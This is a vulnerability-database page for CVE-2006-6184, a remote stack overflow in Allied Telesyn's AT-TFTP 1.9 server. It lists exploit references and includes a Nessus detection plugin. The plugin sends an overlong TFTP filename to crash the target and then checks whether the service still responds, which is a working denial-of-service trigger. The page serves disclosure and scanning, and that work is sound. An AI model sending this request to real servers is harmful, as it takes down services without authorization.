CVE-2006-6184 - Remote Buffer Overflow vulnerability in Alliedtelesyn At-Tftp 1.9

CVSS 10.0 - CRITICAL
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: COMPLETE
Integrity impact: COMPLETE
Availability impact: COMPLETE
Tags: network, low complexity, alliedtelesyn, critical, nessus, exploit available, metasploit

Summary

Multiple stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via a long filename in a (1) GET or (2) PUT command.

Vulnerable Configurations

Part: Application
Description: Alliedtelesyn
Count: 2

Exploit-Db

  • description: TFTP Daemon v1.9 Denial of Service Exploit. CVE-2006-6184. Dos exploit for windows platform
    id: EDB-ID:10603
    last seen: 2016-02-01
    modified: 2009-12-22
    published: 2009-12-22
    reporter: Socket_0x03
    source: https://www.exploit-db.com/download/10603/
    title: TFTP Daemon 1.9 - Denial of Service Exploit
  • description: AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS. CVE-2006-6184. Dos exploit for windows platform
    file: exploits/windows/dos/24952.py
    id: EDB-ID:24952
    last seen: 2016-02-03
    modified: 2013-04-12
    platform: windows
    port: 69
    published: 2013-04-12
    reporter: xis_one
    source: https://www.exploit-db.com/download/24952/
    title: AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS
    type: dos
  • description: Allied Telesyn TFTP Server 1.9 Long Filename Overflow. CVE-2006-6184. Remote exploit for windows platform
    file: exploits/windows/remote/16350.rb
    id: EDB-ID:16350
    last seen: 2016-02-01
    modified: 2011-03-05
    platform: windows
    port:
    published: 2011-03-05
    reporter: metasploit
    source: https://www.exploit-db.com/download/16350/
    title: Allied Telesyn TFTP Server 1.9 - Long Filename Overflow
    type: remote

Metasploit

description: This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name.
id: MSF:EXPLOIT/WINDOWS/TFTP/ATTFTP_LONG_FILENAME
last seen: 2020-04-11
modified: 2017-11-08
published: 2007-09-09
references: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6184
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/tftp/attftp_long_filename.rb
title: Allied Telesyn TFTP Server 1.9 Long Filename Overflow

Nessus

NASL family: Gain a shell remotely
NASL id: AT_TFTPD_LONG_FILENAME_OVERFLOW.NASL
description: The remote host appears to be running AT-TFTP Server, a tftpd server for Windows. The version of AT-TFTP Server installed on the remote host appears to be affected by a buffer overflow vulnerability involving long filenames when getting or putting files. By leveraging this flaw, a remote attacker may be able to crash the remote service or to execute code on the affected host subject to the privileges under which the server operates.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 23736
published: 2006-11-28
reporter: This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/23736
title: AT-TFTP Server Filename Handling Remote Overflow
code:
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description)
{
  script_id(23736);
  script_version("1.17");

  script_cve_id("CVE-2006-6184");
  script_bugtraq_id(21320);

  script_name(english:"AT-TFTP Server Filename Handling Remote Overflow");
  script_summary(english:"Checks for a buffer overflow vulnerability in AT-TFTP Server");

  script_set_attribute(attribute:"synopsis", value:
"The remote tftp server is affected by a buffer overflow vulnerability." );
  script_set_attribute(attribute:"description", value:
"The remote host appears to be running AT-TFTP Server, a tftpd server
for Windows.

The version of AT-TFTP Server installed on the remote host appears to
be affected by a buffer overflow vulnerability involving a long
filenames when getting or putting files.  By leveraging this flaw, a
remote attacker may be able to crash the remote service or to execute
code on the affected host subject to the privileges under which the
server operates." );
  script_set_attribute(attribute:"see_also", value:"http://aluigi.altervista.org/adv/attftp-adv.txt" );
  script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/452743/30/0/threaded" );
  script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Allied Telesyn TFTP Server 1.9 Long Filename Overflow');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2006/11/28");
  script_set_attribute(attribute:"vuln_publication_date", value: "2006/11/26");
  script_cvs_date("Date: 2019/03/06 18:38:55");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();


  script_category(ACT_DENIAL);
  script_family(english:"Gain a shell remotely");
  script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc.");
  script_dependencies("tftpd_detect.nasl");
  script_require_keys("Services/udp/tftp", "Settings/ParanoidReport");
  exit(0);
}


include("misc_func.inc");
include("global_settings.inc");


if (report_paranoia < 2)
  exit(0, "This script only runs in 'paranoid' mode.");


port = get_kb_item("Services/udp/tftp");
if (!port) port = 69;


function tftp_get(port, file, mode) {
  local_var data, filter, i, ip, req, res, sport, udp;

  if (isnull(port)) port = 69;
  if (isnull(mode)) mode = "netascii";
  if (isnull(file)) return NULL;

  req = raw_string(
    0x00, 0x01,                        # Get
    file, 0x00,                        # file
    mode, 0x00                         # as per specified mode
  );

  ip = forge_ip_packet(
    ip_hl:5, 
    ip_v:4, 
    ip_tos:0, 
    ip_len:20, 
    ip_id:rand(), 
    ip_off:0, 
    ip_ttl:64, 
    ip_p:IPPROTO_UDP,
    ip_src:compat::this_host()
  );
  sport = rand() % 64512 + 1024;       # random ephemeral source port
  udp = forge_udp_packet(
    ip:ip, 
    uh_sport:sport, 
    uh_dport:port, 
    uh_ulen:8 + strlen(req), 
    data:req
  );

  filter = 'udp and dst port ' + sport + ' and src host ' + get_host_ip() + ' and udp[8:1]=0x00';
  res = send_packet(
    udp, 
    pcap_active:TRUE, 
    pcap_filter:filter, 
    pcap_timeout:1
  );

  # If there's a result, return the data.
  if (res) {
    return get_udp_element(udp:res, element:"data");
  }
}


# If the server is up...
file = string(SCRIPT_NAME, "-", unixtime());
res = tftp_get(port:port, file:file);
if (!isnull(res)) {
  # Send the exploit.
  res = tftp_get(port:port, file:crap(227));

  # Test the server again.
  res = tftp_get(port:port, file:file);

  # There's a problem if we didn't get anything back.
  if (isnull(res)) security_hole(port:port, protocol:"udp");
}

Packetstorm

data source: https://packetstormsecurity.com/files/download/83147/attftp_long_filename.rb.txt
id: PACKETSTORM:83147
last seen: 2016-12-05
published: 2009-11-26
reporter: Patrick Webster
source: https://packetstormsecurity.com/files/83147/Allied-Telesyn-TFTP-Server-1.9-Long-Filename-Overflow.html
title: Allied Telesyn TFTP Server 1.9 Long Filename Overflow

Statements

contributor: Sheldon Duthie
last modified: 2007-04-17
organization: Allied Telesyn
statement: More recent revision AT-TFTPD Server 2.0 does not suffer the listed vulnerability. Only the more recent revision AT-TFTPD Server 2.0 can be found for download from our website, currently via the following link: http://www.alliedtelesis.com/support/software/default.aspx?cid=1&pid=182